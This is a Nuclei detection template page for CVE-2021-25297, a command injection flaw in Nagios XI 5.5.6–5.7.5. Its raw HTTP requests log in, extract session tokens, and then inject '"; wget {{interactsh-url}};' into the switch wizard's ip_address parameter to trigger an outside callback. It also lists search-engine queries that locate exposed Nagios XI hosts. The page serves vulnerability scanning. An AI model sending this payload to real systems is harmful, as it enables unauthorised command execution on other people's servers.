Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
ID: CVE-2021-25297
Severity: high
Author: k0pak4
Tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios
Description
Section titled “Description”Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
YAML Source
Section titled “YAML Source”id: CVE-2021-25297
info: name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection author: k0pak4 severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. impact: | Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability. reference: - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md - https://github.com/rapid7/metasploit-framework/pull/17494 - http://nagios.com - https://nvd.nist.gov/vuln/detail/CVE-2021-25297 - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 epss-score: 0.89037 epss-percentile: 0.98721 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: nagios product: nagios_xi shodan-query: - title:"Nagios XI" - http.title:"nagios xi" fofa-query: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios
http: - raw: - | GET /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} - | POST /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}} - | GET /nagiosxi/index.php HTTP/1.1 Host: {{Hostname}} - | @timeout: 20s GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"
- type: word part: body_4 words: - "<b>Ping</b>" - "Switch Details" condition: and
- type: status status: - 200
extractors: - type: regex name: nsp group: 1 regex: - "name=['\"]nsp['\"] value=['\"](.*)['\"]>" internal: true part: body
- type: regex name: nsp_auth group: 1 regex: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body# digest: 4a0a004730450220360c1494570e0ff5fe26b078eb0f6e21693cccf863585f9c49a97b4d00490bd4022100b7c18b74381ebec4cf6707fd977f53f8499998ae10791c21eeb8ad2a910534f7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25297.yaml"